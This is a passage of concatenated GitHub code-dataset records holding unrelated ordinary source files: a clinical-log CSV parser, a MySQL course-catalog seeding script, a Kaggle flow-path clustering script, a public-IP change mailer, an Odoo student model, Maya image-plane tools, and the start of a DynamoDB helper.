open(file_name,'a'):\n os.utime(file_name,None);\n\nimport errno;\ndef mkdir_p(path):\n if(not(os.path.exists(path) and os.path.isdir(path))):\n try:\n os.makedirs(path,exist_ok=True);\n except OSError as exc: # Python >2.5\n if exc.errno 
== errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise \n\n\ndef format_my_nanos(nanos):\n dt = datetime.datetime.fromtimestamp(nanos / 1e9)\n #return '{}.{:09.0f}'.format(dt.strftime('%Y-%m-%dT%H:%M:%S'), nanos % 1e9);\n return '{}_{:09.0f}'.format(dt.strftime('%Y%m%d%H%M%S'), nanos % 1e9);\n\n\ndef timestamp_from_nano_seconds(nanos):\n dt = datetime.datetime.fromtimestamp(nanos / 1e9)\n #return '{}.{:09.0f}'.format(dt.strftime('%Y-%m-%dT%H:%M:%S'), nanos % 1e9);\n return '{}_{:09.0f}'.format(dt.strftime('%Y/%m/%d %H:%M:%S'), nanos % 1e9);\n\n\nclass InfiniteTimer():#see https://stackoverflow.com/questions/12435211/python-threading-timer-repeat-function-every-n-seconds\n \"\"\"A Timer class that does not stop, unless you want it to.\"\"\";\n def __init__(self, seconds, target, countdown__upperbound):\n self._should_continue = False;\n self.is_running = False;\n self.seconds = seconds;\n self.target = target;\n self.thread = None;\n self.countdown__upperbound=countdown__upperbound;\n \n def _handle_target(self):\n self.is_running = True;\n self.target();\n self.is_running = False;\n self._start_timer();\n \n def _start_timer(self):\n if self._should_continue: # Code could have been running when cancel was called.;\n self.thread = threading.Timer(self.seconds, self._handle_target);\n LOGGER.info(\"self.countdown__upperbound is:%d\"%(self.countdown__upperbound));\n if(self.countdown__upperbound>0):\n self.thread.start();\n self.countdown__upperbound-=1;\n else:\n self._should_continue=False;\n \n def start(self):\n if not self._should_continue and not self.is_running:\n self._should_continue = True;\n self._start_timer();\n else:\n print(\"Timer already started or running, please wait if you're restarting.\");\n \n def cancel(self):\n if self.thread is not None:\n self._should_continue = False # Just in case thread is running and cancel fails.;\n self.thread.cancel();\n else:\n print(\"Timer never started or failed to initialize.\");\n\n\n\nfrom xml.sax import make_parser\nfrom xml.sax.handler import feature_namespaces\n\nif __name__ == '__main__':\n task_formulation_timestamp=None;#datetime.datetime.strptime('20180910_135822_123456', '%Y%m%d_%H%M%S_%f');\n task_formulation_timestamp_str=None;#'20180910_135822_123456';\n working_dir_file_name=None;\n src_csv_dataset_file_name=None;\n dest_csv_dataset_dir_name=None;\n count_of_workers=1;\n usage=\"usage: %prog [options] arg1 [[arg2]..]\"\n version=\"version: 0.001\"\n\n import argparse;\n parser=argparse.ArgumentParser();\n try:\n parser.add_argument(\"-t\",\"--task_formulation_timestamp_str\",action=\"append\",type=str,dest=\"op__task_formulation_timestamp_str\",help=\"\"\"\n This variable will contain the current timestamp in 'Ymd_HMS_f' format, for example '20180910_135822_123456'. 
This timestamp will be the bases of the task id of this job.\n \"\"\");\n parser.add_argument(\"-o\",\"--working_dir_file_name\",action=\"append\",type=str,dest=\"op__working_dir_file_name\",help=\"\"\"\n The full path to the directory where temporary data will be written.\n \"\"\");\n parser.add_argument(\"-f\",\"--src_csv_dataset_file_name\",action=\"append\",type=str,dest=\"op__src_csv_dataset_file_name\",help=\"The full path to the CSV file where the input dataset is to be found.\")\n parser.add_argument(\"-d\",\"--dest_csv_dataset_dir_name\",action=\"append\",type=str,dest=\"op__dest_csv_dataset_dir_name\",help=\"The full directory path where the resultant CSV file will be written.\")\n parser.add_argument(\"-w\",\"--count_of_workers\",action=\"append\",type=int,dest=\"op__count_of_workers\",help=\"\"\"\n The count of workers to launch (via multiprocessing).\n \"\"\");\n \n (options)=parser.parse_args(sys.argv[1:])\n if len(sys.argv)<4:\n parser.error(\"\"\"\n ERROR: Missing required arguments\n -t, --task_formulation_timestamp_str\n This variable will contain the current timestamp in 'Ymd_HMS_f' format, for example '20180910_135822_123456'. This timestamp will be the bases of the task id of this job.\n -o, --working_dir_file_name\n The full path to the directory where temporary data will be written.\n -f, --src_csv_dataset_file_name\n The full path to the CSV file where the input dataset is to be found.\n -d, --dest_csv_dataset_dir_name\n The full directory path where the resultant CSV file will be written.\n -w, --count_of_workers\n The count of workers to launch (via multiprocessing).\n \"\"\");\n \n if(options.op__task_formulation_timestamp_str):\n task_formulation_timestamp_str=options.op__task_formulation_timestamp_str[0].strip();\n if(options.op__working_dir_file_name):\n working_dir_file_name=options.op__working_dir_file_name[0].strip();\n if(options.op__src_csv_dataset_file_name):\n src_csv_dataset_file_name=options.op__src_csv_dataset_file_name[0];\n if(options.op__dest_csv_dataset_dir_name):\n dest_csv_dataset_dir_name=options.op__dest_csv_dataset_dir_name[0];\n mkdir_p(os.path.abspath(os.path.join(dest_csv_dataset_dir_name, os.pardir)));\n mkdir_p(os.path.abspath(dest_csv_dataset_dir_name));\n if(options.op__count_of_workers):\n count_of_workers=int(options.op__count_of_workers[0]);\n\n #parser.destroy()\n except argparse.ArgumentError:\n #print help infor and exit\n usage()\n sys.exit(2)\n \n print(\"dest_csv_dataset_dir_name is:'%s'\"%(dest_csv_dataset_dir_name));\n #print(\"dest_ddl_file_name is:'%s'\"%(dest_ddl_file_name));\n logging.basicConfig(level=logging.INFO, format=LOG_FORMAT);\n \n task_formulation_timestamp=None;\n if(task_formulation_timestamp_str!=None and len(task_formulation_timestamp_str)>0):\n task_formulation_timestamp=datetime.datetime.strptime(task_formulation_timestamp_str, '%Y%m%d_%H%M%S_%f');\n else:\n task_formulation_timestamp=datetime.datetime.now();\n task_id=\"%s\"%(task_formulation_timestamp.strftime('%Y-%m-%d_%H%M%S_%f')[:-3]);#import datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-1]\n \n hostname=socket.gethostname().strip();\n ipAddress=getLocalIPAddress();\n pid=os.getpid();\n worker_id='%s_%s_%d'%(hostname,ipAddress,pid);\n LOGGER.info(\" '%s', -------------- hostname:'%s', ipAddress:'%s', pid:%d, worker_id:'%s', task_id:'%s'\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),hostname,ipAddress,pid,worker_id,task_id));\n LOGGER.info(\" '%s', -------------- src_csv_dataset_file_name 
is:'%s'\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),src_csv_dataset_file_name));\n LOGGER.info(\" '%s', -------------- dest_csv_dataset_dir_name is:'%s'\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),dest_csv_dataset_dir_name));\n LOGGER.info(\" '%s', -------------- count_of_workers is:'%s'\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),count_of_workers));\n process_list=[];\n queue_list=[];#this array will contain objects of multiprocessing.Queue (which is a near clone of queue.Queue)\n worker_list=[];\n \n try:\n for i in range(count_of_workers):\n #Instantiates the thread\n #(i) dos not make a sequence, so we use (i,)\n worker_id2='%s__%s__%d'%('BORG_DDIEM__parse_clinical_logs_CSV',worker_id,i);\n LOGGER.info(\">>>>>>>>>>worker_tag:'%s'\"%(worker_id2));\n \n worker_number=i;\n w=BORG_DDIEM__parse_clinical_logs_CSV(\n hostname,ipAddress,pid\n ,task_id\n ,task_formulation_timestamp\n ,worker_id2\n ,worker_number\n ,working_dir_file_name\n ,src_csv_dataset_file_name\n ,\"%s\"%(dest_csv_dataset_dir_name)\n );\n \"\"\"\n t=threading.Thread(\n target=run_BORG_DDIEM__parse_clinical_logs_CSV\n ,args=(\n d\n ,worker_id2\n )\n );\n thread_list.append(t);\n worker_list.append(d);\n \"\"\"\n q=multiprocessing.Queue();\n p=multiprocessing.Process(\n target=run_BORG_DDIEM__parse_clinical_logs_CSV\n ,args=(\n w\n ,q\n ,worker_id2\n )\n );\n process_list.append(p);\n queue_list.append(q);\n worker_list.append(w);\n \n for process in process_list:\n process.start();\n \n #block the current process till join() returns\n #for process in process_list:\n for i,process in enumerate(process_list):\n cont=True;\n while(cont):\n #LOGGER.info(\"============Looping, i is:%d, process_list[%d].isAlive() is:'%s'\"%(i,i,process_list[i].isAlive()));\n process.join(60);#wait for 60 seconds.\n if(process.is_alive()):\n #timout occurred on process\n cont=True;\n #LOGGER.info(\"timeout occurred on process:'%s'.\"%(worker_list[i].worker_id));\n #worker_list[i].stop();\n #worker_list[i].some_function();\n else:\n cont=False;\n #LOGGER.info(\"execution completes for process:'%s'.\"%(worker_list[i].consumer_tag));\n for i,worker in enumerate(worker_list):\n pass;\n \"\"\"\n \"\"\";\n #processing_outcome__dict=worker_list[i]._processing_outcome__dict;\n #processing_outcome__dict=worker_list[i].get_processing_outcome();\n processing_outcome__dict=queue_list[i].get();\n #LOGGER.info(\"[=]%s, %s\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),json.dumps(processing_outcome__dict,indent=4)));\n LOGGER.info(\"processing_outcome__dict is:'%s'\"%(json.dumps(processing_outcome__dict,indent=4)));\n worker_list[i]=None;\n worker=None;\n \n except KeyboardInterrupt:\n for i,worker in enumerate(worker_list):\n pass;\n \"\"\"\n \"\"\";\n #cleanup\n #worker.cleanup();\n if(worker_list[i]!=None):\n worker_list[i].stop();\n processing_outcome__dict=worker_list[i]._processing_outcome__dict;\n worker_list[i]=None;\n worker=None;\n worker_list=None;\n queue_list=None;\n process_list=None;\n \"\"\"\n except Exception as error:\n LOGGER.error(\"An error has been detected. 
Reason:'%s'\"%(error));\n worker_list=None;\n thread_list=None;\n \"\"\"\n worker_list=None;\n queue_list=None;\n process_list=None;\n\n","repo_name":"bio-ontology-research-group/DDIEM","sub_path":"website/transformers/src/py/clinical_logs_data_transformation/BORG_DDIEM__parse_clinical_logs_CSV.py","file_name":"BORG_DDIEM__parse_clinical_logs_CSV.py","file_ext":"py","file_size_in_byte":20060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29279707141","text":"import mysql.connector\nimport re\nimport csv \nfrom decouple import config\n\n\n\ndb = mysql.connector.connect(\n host= config(\"DB_HOST\"),\n user= config(\"DB_USER\"),\n password= config(\"DB_PASSWORD\"),\n database= config(\"DB_NAME\")\n)\n\ncursor=db.cursor()\ncsv_folder=\"/home/youssef/dev/projects/Advisily/repo/db/scrapper/src/csv\"\n\ndef insertCourses():\n with open(f\"{csv_folder}/courses.csv\",mode=\"r\") as csv_file:\n courses_reader=csv.DictReader(csv_file)\n\n sql='''INSERT IGNORE INTO courses(courseCode, courseTitle, prefix, credits) \n VALUES (%s,%s,%s,%s)'''\n for courseRow in courses_reader:\n\n values= list(courseRow.values())\n for i in range(len(values)):\n if(re.search(\"null\",values[i],flags=re.IGNORECASE)):values[i]=None\n\n cursor.execute(sql, values)\n\n db.commit()\n\ndef insertMajors():\n with open(f\"{csv_folder}/majors.csv\",mode=\"r\") as csv_file:\n majors_reader=csv.DictReader(csv_file)\n print(majors_reader)\n sql='''INSERT IGNORE INTO majors(majorTitle) VALUES (%s)'''\n for courseRow in majors_reader:\n majors= list(courseRow.values())\n cursor.execute(sql, majors)\n\n db.commit()\n\ndef insertMinors():\n with open(f\"{csv_folder}/minors.csv\",mode=\"r\") as csv_file:\n minors_reader=csv.DictReader(csv_file)\n sql='''INSERT IGNORE INTO minors(minorTitle) VALUES (%s)'''\n for courseRow in minors_reader:\n minors= list(courseRow.values())\n cursor.execute(sql, minors)\n\n db.commit()\n print(cursor.rowcount, \"record inserted.\")\n\ndef insertCatalogs():\n\n with open(f\"{csv_folder}/catalogs/catalogs.csv\",\"r\") as catalogs_file:\n catalogs_reader=csv.DictReader(catalogs_file)\n sql='''INSERT IGNORE INTO catalogs(year,coreCredits,concReqCredits,concElecCredits,collateralCredits,generalElecCredits,engCoreCredits,majorId)\n VALUES(%s,%s,%s,%s,%s,%s,%s,%s)'''\n\n for catalogRow in catalogs_reader:\n\n majorTitle=catalogRow.pop(\"majorTitle\")\n majorId=_get_majorId(majorTitle)\n if(majorId is None): \n continue\n catalogRow[\"majorId\"]=majorId\n\n values=list(catalogRow.values())\n cursor.execute(sql,values)\n db.commit()\n\n \n\ndef insertCourseTypes():\n with open(f\"{csv_folder}/courseTypes.csv\",\"r\") as course_types_file:\n sql=\"INSERT INTO courseTypes VALUES(%s,%s)\"\n types_reader=csv.DictReader(course_types_file)\n for typeRow in types_reader:\n cursor.execute(sql,list(typeRow.values()))\n db.commit()\n\n\ndef insertCatalogCourses():\n catalogYears=[ \"2016-2017\",\"2017-2018\",\"2018-2019\",\"2019-2020\",\"2020-2021\",\"2021-2022\"]\n insert_sql='''INSERT INTO catalogCourses(courseTypeId,catalogId,courseId)\n VALUES(%s,%s,%s)'''\n try:\n for year in catalogYears: \n with open(f\"{csv_folder}/catalogs/catalog_courses_{year}.csv\",\"r\") as catalogs_file:\n courses_reader=csv.DictReader(catalogs_file)\n\n for courseRow in courses_reader:\n temp=courseRow\n majorTitle=courseRow.pop(\"majorTitle\")\n catalogYear=courseRow.pop(\"catalogYear\")\n courseCode=courseRow.pop(\"courseCode\")\n prefix=courseRow.pop(\"prefix\")\n 
if(prefix==\"CSCE\" and int(courseCode)==4311): #wide area networks became computer network\n courseCode=3312\n if(prefix==\"CSCE\" and int(courseCode)==4312):\n courseCode=3313\n\n\n catalogId=_get_catalogId(catalogYear,majorTitle)\n courseId=_get_courseId_by_code_prefix(courseCode,prefix)\n if(not (catalogYear and courseId)): continue\n\n courseRow[\"catalogId\"]=catalogId\n courseRow[\"courseId\"]=courseId\n if(not catalogId):\n print(\"HERE: \",temp,majorTitle,catalogYear,courseCode)\n values=list(courseRow.values())\n cursor.execute(insert_sql,values)\n with open(f\"{csv_folder}/catalogs/catalog_core_courses.csv\",\"r\") as core_courses_file:\n courses_reader=csv.DictReader(core_courses_file)\n cursor.execute(\"SELECT catalogId from catalogs\")\n catalogIds=cursor.fetchall()\n for courseRow in courses_reader:\n courseCode=courseRow.pop(\"courseCode\")\n prefix=courseRow.pop(\"prefix\")\n courseId=_get_courseId_by_code_prefix(courseCode,prefix)\n if(not (courseId)): continue\n print(courseRow)\n for catalogId in catalogIds:\n courseRow[\"catalogId\"]=catalogId[0]\n courseRow[\"courseId\"]=courseId\n values=list(courseRow.values())\n\n cursor.execute(insert_sql,values)\n except ValueError:\n print(ValueError)\n db.commit()\n\ndef insertStandings():\n sql=\"INSERT INTO standings(standingId,standing,creditHrs) VALUES (%s,%s,%s)\"\n with open(f\"{csv_folder}/standings.csv\",\"r\") as standings_folder:\n standings_reader=csv.DictReader(standings_folder)\n for standingRow in standings_reader:\n cursor.execute(sql,list(standingRow.values()))\n db.commit()\n\n\ndef insertPaces():\n sql=\"INSERT INTO paces(paceTitle) VALUES (%s)\"\n with open(f\"{csv_folder}/paces.csv\",\"r\") as paces_folder:\n paces_reader=csv.DictReader(paces_folder)\n for paceRow in paces_reader:\n cursor.execute(sql,list(paceRow.values()))\n db.commit()\n\ndef insertRequisiteTypes():\n sql=\"INSERT INTO requisiteTypes(requisiteTypeId,requisiteType) VALUES (%s, %s)\"\n with open(f\"{csv_folder}/requisites/requisiteTypes.csv\",\"r\") as requisite_types_folder:\n requisite_types_reader=csv.DictReader(requisite_types_folder)\n for typeRow in requisite_types_reader:\n cursor.execute(sql,list(typeRow.values()))\n db.commit()\n\ndef insertPlans():\n insert_sql=\"INSERT INTO planCourses(semesterNumber,catalogId,courseId) VALUES (%s, %s,%s)\"\n # plan_years=[\"2016-2017\",\"2017-2018\",\"2018-2019\",\"2019-2020\",\"2020-2021\"]\n plan_years=[\"2020-2021\"]\n plan_majors=[\"cs\"]\n try:\n for major in plan_majors: \n for year in plan_years:\n with open(f\"{csv_folder}/plans/plan_{major}_{year}.csv\",\"r\") as plans_folder:\n plans_reader=csv.DictReader(plans_folder)\n err=False\n for planRow in plans_reader:\n catalogYear=planRow.pop(\"catalogYear\")\n majorTitle=planRow.pop(\"majorTitle\")\n prefix=planRow.pop(\"prefix\")\n courseCode=planRow.pop(\"courseCode\")\n\n catalogId=_get_catalogId(catalogYear,majorTitle)\n courseId=_get_courseId_by_code_prefix(courseCode,prefix)\n if(not (catalogId and courseId)):\n err=True\n # print(f\"{catalogId} {courseId}, {prefix}\\n{planRow} {courseCode}\")\n break\n planRow[\"catalogId\"]=catalogId\n planRow[\"courseId\"]=courseId\n cursor.execute(insert_sql,list(planRow.values()))\n if(not err):\n db.commit()\n print(cursor.rowcount, \"plans inserted sucessfully\")\n else: print(\" didn't insert plans with caalogId & courseId=\",catalogId,courseId,courseCode)\n except ValueError:\n print(ValueError)\n\n\n\n\ndef _get_majorId(majorTitle):\n sql = \"SELECT majorId from majors WHERE majorTitle LIKE 
%s LIMIT 1\"\n majorTitle=\"%\"+majorTitle+\"%\"\n \n cursor.execute(sql,[majorTitle])\n majorId=cursor.fetchone()\n return majorId[0] if majorId else None\n\ndef _get_catalogId(catalogYear,majorTitle):\n majorId= _get_majorId(majorTitle)\n if(not majorId): return None\n sql=\"SELECT catalogId from catalogs WHERE year LIKE %s AND majorId= %s LIMIT 1\"\n cursor.execute(sql,[catalogYear,majorId])\n catalogId=cursor.fetchone()\n return catalogId[0] if catalogId else None\n\ndef _get_courseId_by_code_prefix(courseCode,prefix):\n print(courseCode,prefix)\n sql=\"SELECT courseId from courses WHERE courseCode= %s AND prefix = %s LIMIT 1\"\n cursor.execute(sql,[courseCode,prefix])\n courseId=cursor.fetchone()\n return courseId[0] if courseId else None\n\ndef _get_courseId_by_title(courseTitle):\n courseTitleLike= \"%\"+courseTitle+\"%\"\n sql=\"SELECT courseId from courses WHERE courseTitle= %s or courseTitle LIKE %s LIMIT 1\"\n cursor.execute(sql,[courseTitle,courseTitleLike])\n courseId=cursor.fetchone()\n return courseId[0] if courseId else None\n\n\ndef insertCourseRequites():\n sql='''INSERT INTO courseRequisites(setId,courseId) \n VALUES(%s,%s)\n '''\n with open(f\"{csv_folder}/requisites/courseRequisites.csv\",\"r\") as requisites_folder:\n requisites_reader=csv.DictReader(requisites_folder)\n for requisiteRow in requisites_reader:\n prefix=requisiteRow.pop('prefix')\n courseCode=requisiteRow.pop('courseCode')\n courseId=_get_courseId_by_code_prefix(courseCode,prefix)\n requisiteRow[\"courseId\"]=courseId\n print(requisiteRow)\n cursor.execute(sql,list(requisiteRow.values()))\n db.commit()\n\n\ndef insertRequisiteSets():\n sql='''INSERT INTO requisiteSets(setId,requisiteTypeId,requisiteId) \n VALUES(%s,%s,%s)\n '''\n with open(f\"{csv_folder}/requisites/requisiteSets.csv\",\"r\") as requisites_folder:\n requisites_reader=csv.DictReader(requisites_folder)\n for requisiteRow in requisites_reader:\n prefix=requisiteRow.pop('requisitePrefix')\n courseCode=requisiteRow.pop('requisiteCode')\n requisiteCourseId=_get_courseId_by_code_prefix(courseCode,prefix)\n requisiteRow[\"requisiteId\"]=requisiteCourseId\n print(requisiteRow)\n cursor.execute(sql,list(requisiteRow.values()))\n db.commit()\n\n\n# insertStandings()\n# insertMajors()\n# insertMinors()\n# insertCourses()\n# insertRequisiteTypes()\n# insertCourseTypes()\n# insertCatalogs()\n# insertPaces()\ninsertPlans()\n# insertCatalogCourses()\n\n# insertCourseRequites()\n# insertRequisiteSets()","repo_name":"Youssef-Agiza/Advisily","sub_path":"db/scrapper/src/sql/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":10744,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"2370335245","text":"import sys\r\n\r\ndef get_flow_path(iterable):\r\n return tuple([idx for idx, element in enumerate(iterable) if element != \"\"])\r\n\r\nnumeric=\"../input/train_numeric.csv\"\r\ncategorical=\"../input/train_categorical.csv\"\r\n#\r\n#\r\n# Question 1: Are there any meaningful clusters by the measured features?\r\n# An interesting extension to this is to see if the features are unique to the line and station they are measured at...\r\n# ... 
this is left by the author as an exercise to the reader.\r\n#\r\n#\r\n\r\nflow_paths = {}\r\nwith open(numeric, \"r\") as n:\r\n with open(categorical, \"r\") as c:\r\n n.readline()\r\n c.readline()\r\n counter = 0\r\n for n_row, c_row in zip(n, c):\r\n counter += 1\r\n if counter % 1000 == 0:\r\n print(\"processing_row: {}\".format(counter))\r\n n_row = n_row.strip()\r\n c_row = c_row.strip()\r\n n_id, n_row = n_row.split(\",\")[0], n_row.split(\",\")[1:]\r\n c_id, c_row = c_row.split(\",\")[0], c_row.split(\",\")[1:]\r\n assert(n_id == c_id)\r\n idx = n_id\r\n whole_row = n_row + c_row\r\n fp = get_flow_path(whole_row)\r\n if fp in flow_paths.keys():\r\n flow_paths[fp].append(idx)\r\n else:\r\n flow_paths[fp] = [idx]\r\n\r\n#\r\n#\r\n# Question 2: How big are the clusters generated by this grouping method?\r\n# What is the error rate per cluster...\r\n# ... This potentially interesting result is also left as an exercise to the reader ...\r\n#\r\n#\r\n\r\nimport json\r\nwith open(\"flow_path.json\", \"w\") as fout:\r\n for key, value in flow_paths.items():\r\n fout.write(str(key) + \",\" + str(value)+\"\\n\")\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nflow_path_length = [len(value) for key, value in flow_paths.items()]\r\nflow_path_length.sort()\r\nx_values = list(range(len(flow_path_length)))\r\nplt.plot(x_values, flow_path_length)\r\nplt.title(\"Show the cluster sizes\")\r\nplt.savefig(\"cluster_sizes.png\")\r\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/bosch-production-line-performance/Melvyn Drag/feature-clusters.py","file_name":"feature-clusters.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"26202376732","text":"import os\nimport urllib2\nimport json\n\n# read latest ip from file\nip1 = open('ip.txt', 'r').read()\n#print ip1\n\n# get current ip\nresponse = urllib2.urlopen('https://api.ipify.org?format=json')\nip2 = json.load(response)\nip2 = ip2['ip']\n#print ip2\n\n# compare ip's and send email if ip has changed\nif ip1 == ip2:\n 1 == 1\n #print \"they are the same\"\nelse:\n f = open(\"ip.txt\",\"w\")\n f.write(str(ip2))\n f.close()\n #print \"different\"\n os.system(\"echo \\\" %s \\\" | mail -s \\\"mokkula\\\" CHANGE@saunalahti.fi\" % ip2)\n","repo_name":"artturig/ipsender","sub_path":"ipsender.py","file_name":"ipsender.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4586427180","text":"from odoo import models, fields, api\n\n\nclass Student(models.Model):\n _inherit = 'ix.student' \n\n attendance_line_absent_ids = fields.One2many(comodel_name='ixlms.attendance.line', compute='_attendance_line_absent_ids', string='Missed Classes')\n earned_sch = fields.Integer(compute='_sch', string='Earned Credits')\n remaining_sch = fields.Integer(compute='_sch', string='Remaining Credits')\n progress = fields.Float(string='Progress Towards Degree', compute='_sch')\n on_probation = fields.Boolean(string='On Probation', default=False, tracking=True) \n \n\n def _sch(self):\n for rec in self:\n earned_sch = 0\n for enrollment in rec.enrollment_ids:\n if enrollment.state == 'completed' and enrollment.passed:\n earned_sch += enrollment.course_id.sch\n rec.earned_sch = earned_sch\n rec.remaining_sch = rec.program_sch - earned_sch\n if rec.program_sch == 0:\n rec.progress = 0\n else:\n rec.progress = float(rec.earned_sch) * 100 / rec.program_sch\n\n 
def _attendance_line_absent_ids(self):\n for rec in self:\n rec.attendance_line_absent_ids = self.env['ixlms.attendance.line'].search([\n ('student_id', '=', rec.id), ('state', '=', 'absent')])\n \n ","repo_name":"oiraqi/academix","sub_path":"ixlms/models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"71936310243","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport maya.cmds\n\nimport mmSolver.logger\nimport mmSolver.api as mmapi\nimport mmSolver.utils.camera as camera_utils\nimport mmSolver.utils.python_compat as pycompat\n\nimport mmSolver.tools.createimageplane.constant as const\nimport mmSolver.tools.createimageplane._lib.constant as lib_const\nimport mmSolver.tools.createimageplane._lib.utilities as lib_utils\nimport mmSolver.tools.createimageplane._lib.shader as lib_shader\nimport mmSolver.tools.createimageplane._lib.mmimageplane as lib_mmimageplane\nimport mmSolver.tools.createimageplane._lib.polyplane as lib_polyplane\nimport mmSolver.tools.createimageplane._lib.nativeimageplane as lib_nativeimageplane\n\nLOG = mmSolver.logger.get_logger()\n\n\ndef create_image_plane_on_camera(cam, name=None):\n \"\"\"Create an Image Plane that can be distorted in Maya's viewport\n (realtime).\n \"\"\"\n if name is None:\n name = 'mmImagePlane1'\n assert isinstance(cam, mmapi.Camera)\n assert isinstance(name, pycompat.TEXT_TYPE)\n cam_tfm = cam.get_transform_node()\n cam_shp = cam.get_shape_node()\n\n mm_ip_tfm = lib_mmimageplane.create_transform_node(name, cam_tfm, cam_shp)\n\n poly_plane_name = name + 'MeshShape'\n poly_plane_network = lib_polyplane.create_poly_plane(\n poly_plane_name, mm_ip_tfm, cam_shp\n )\n\n name_shade = name + 'Shader'\n shader_network = lib_shader.create_network(name_shade, mm_ip_tfm)\n\n name_img_shp = name + 'Shape'\n mm_ip_shp = lib_mmimageplane.create_shape_node(\n name_img_shp, mm_ip_tfm, cam_shp, poly_plane_network, shader_network\n )\n\n # Shortcut connections to nodes.\n lib_utils.force_connect_attr(\n shader_network.file_node + '.message', mm_ip_tfm + '.shaderFileNode'\n )\n\n # Logic to calculate the frame number.\n frame_expr = const.FRAME_EXPRESSION.format(node=mm_ip_shp)\n frame_expr = frame_expr.replace('{{', '{')\n frame_expr = frame_expr.replace('}}', '}')\n maya.cmds.expression(string=frame_expr)\n\n # Show the users the final frame number.\n shp_node_attr = mm_ip_shp + '.imageSequenceFrameOutput'\n maya.cmds.setAttr(shp_node_attr, lock=True)\n\n # Set useFrameExtension temporarily. 
Setting useFrameExtension to\n # False causes frameOffset to be locked (but we need to edit it).\n is_seq = maya.cmds.getAttr(shader_network.file_node + '.useFrameExtension')\n maya.cmds.setAttr(shader_network.file_node + '.useFrameExtension', True)\n\n file_node_attr = shader_network.file_node + '.frameExtension'\n lib_utils.force_connect_attr(shp_node_attr, file_node_attr)\n maya.cmds.setAttr(file_node_attr, lock=True)\n\n maya.cmds.setAttr(shader_network.file_node + '.useFrameExtension', is_seq)\n\n # Image sequence.\n image_sequence_path = lib_utils.get_default_image_path()\n set_image_sequence(mm_ip_tfm, image_sequence_path)\n return mm_ip_tfm, mm_ip_shp\n\n\ndef convert_image_planes_on_camera(cam):\n \"\"\"Create an Image Plane that can be distorted in Maya's viewport\n (realtime).\n \"\"\"\n assert isinstance(cam, mmapi.Camera)\n\n # Find image plane currently on the camera.\n cam_tfm = cam.get_transform_node()\n cam_shp = cam.get_shape_node()\n image_planes = camera_utils.get_image_plane_shapes_from_camera(cam_tfm, cam_shp)\n\n ip_node_pairs = []\n for native_ip_shp in image_planes:\n # Convert Maya image plane into a polygon image plane.\n name = 'mmImagePlane1'\n mm_ip_tfm = lib_mmimageplane.create_transform_node(name, cam_tfm, cam_shp)\n\n poly_plane_name = name + 'MeshShape'\n poly_plane_network = lib_polyplane.create_poly_plane(\n poly_plane_name, mm_ip_tfm, cam_shp\n )\n\n lib_nativeimageplane.copy_depth_value(mm_ip_tfm, native_ip_shp)\n\n name_shader = name + 'Shader'\n shader_network = lib_shader.create_network(name_shader, mm_ip_tfm)\n\n name_img_shp = name + 'Shape'\n mm_ip_shp = lib_mmimageplane.create_shape_node(\n name_img_shp, mm_ip_tfm, cam_shp, poly_plane_network, shader_network\n )\n\n # Disable/hide the Maya image plane.\n maya.cmds.setAttr(native_ip_shp + '.displayMode', 0) # 0 = 'None' mode\n maya.cmds.setAttr(native_ip_shp + '.type', 1) # 1 = 'Texture' mode.\n maya.cmds.setAttr(native_ip_shp + '.visibility', False)\n\n ip_node_pairs.append((mm_ip_tfm, mm_ip_shp))\n\n return ip_node_pairs\n\n\ndef set_image_sequence(mm_image_plane_node, image_sequence_path, attr_name=None):\n if attr_name is None:\n attr_name = lib_const.DEFAULT_IMAGE_SEQUENCE_ATTR_NAME\n\n tfm, shp = lib_mmimageplane.get_image_plane_node_pair(mm_image_plane_node)\n if tfm is None or shp is None:\n LOG.warn('mmImagePlane transform/shape could not be found.')\n\n file_node = lib_mmimageplane.get_file_node(tfm)\n if file_node is None:\n LOG.warn('mmImagePlane shader file node is invalid.')\n\n if shp is not None:\n lib_mmimageplane.set_image_sequence(shp, image_sequence_path, attr_name)\n if file_node is not None:\n lib_shader.set_file_path(file_node, image_sequence_path)\n return\n","repo_name":"david-cattermole/mayaMatchMoveSolver","sub_path":"python/mmSolver/tools/createimageplane/_lib/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"14924847698","text":"from __future__ import print_function\n\nimport os\nimport boto3\nimport json\nimport decimal\nimport time\n\nimport database.database_configuration as config\n\nfrom botocore.exceptions import ClientError\nfrom boto3.dynamodb.conditions import Key, Attr\n\nclass DecimalEncoder(json.JSONEncoder):\n \"\"\"\n DecimalEncoder:\n A helper class found in the AWS docs that converts a DynamoDB item to JSON\n \"\"\"\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n if o % 1 > 0:\n return float(o)\n else:\n 
